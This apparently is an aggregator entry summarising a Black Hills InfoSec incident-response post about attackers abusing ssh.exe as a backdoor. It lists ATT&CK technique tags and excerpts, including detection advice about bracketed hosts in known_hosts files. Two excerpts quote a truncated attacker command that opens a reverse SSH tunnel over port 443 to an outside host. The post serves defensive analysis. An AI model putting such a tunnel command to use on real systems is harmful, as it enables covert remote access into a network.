TTPwire Vol. 1 · MITRE ATT&CK · Tagged

Black Hills InfoSec

Ssh… Don’t Tell Them I Am Not HTTPS: How Attackers Use SSH.exe as a Backdoor Into Your Network

Kassie Kimball · 2023-03-21

ATT&CK techniques detected

5 predictions

T1021.004 SSH (94%)
“…There were fraudulent purchases made on personal accounts from their work system when they were not at work at the time. When initially investigating, the client determined that there were Remote Desktop Protocol (RDP) connections from their domain controllers to the endpo…”

T1021.004 SSH (85%)
“…Threat actors know its power and versatility too. It is more capable than just logging in to a remote server and interactively running commands. Take the command we found during this incident investigation for example: ssh.exe [email protected] -f -n -R 50000 -p 443 -o…”

T1021.004 SSH (79%)
“…at all of the known_hosts files in the environment. When SSH connects to a host on a port that is not TCP 22, it will put brackets around the host name. In most environments, brackets in a known_hosts file should be considered suspicious. Please note: the screenshot above is…”

T1572 Protocol Tunneling (66%)
“…Threat actors know its power and versatility too. It is more capable than just logging in to a remote server and interactively running commands. Take the command we found during this incident investigation for example: ssh.exe [email protected] -f -n -R 50000 -p 443 -o…”

T1098.004 SSH Authorized Keys (47%)
“…There were fraudulent purchases made on personal accounts from their work system when they were not at work at the time. When initially investigating, the client determined that there were Remote Desktop Protocol (RDP) connections from their domain controllers to the endpo…”

Summary

Derek Banks // Living Off the Land Binaries, Scripts, and Libraries, known as LOLBins or LOLBAS, are legitimate components of an operating system that threat actors can use to achieve […]

The post Ssh… Don’t Tell Them I Am Not HTTPS: How Attackers Use SSH.exe as a Backdoor Into Your Network appeared first on Black Hills Information Security, Inc.